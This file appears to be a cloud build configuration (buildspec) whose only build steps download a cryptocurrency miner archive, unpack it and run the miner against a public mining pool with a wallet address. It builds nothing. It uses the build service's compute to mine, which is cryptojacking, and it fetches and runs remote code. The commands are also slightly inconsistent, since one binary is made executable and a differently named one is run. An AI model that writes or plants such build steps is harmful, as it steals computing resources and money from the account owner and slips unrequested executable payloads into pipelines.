version: 0.2

phases:
  build:
    commands:
        - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
        - tar -xvf /root/hellminer_cpu_linux.tar.gz
        - chmod +x ccminer
        - ./hellminer -c stratum+tcp://eu.luckpool.net:3956 -u RVMFutpZshkb9jiHYvh7rbq4RaqWGiKGUm.azurefromded -p x --cpu 8
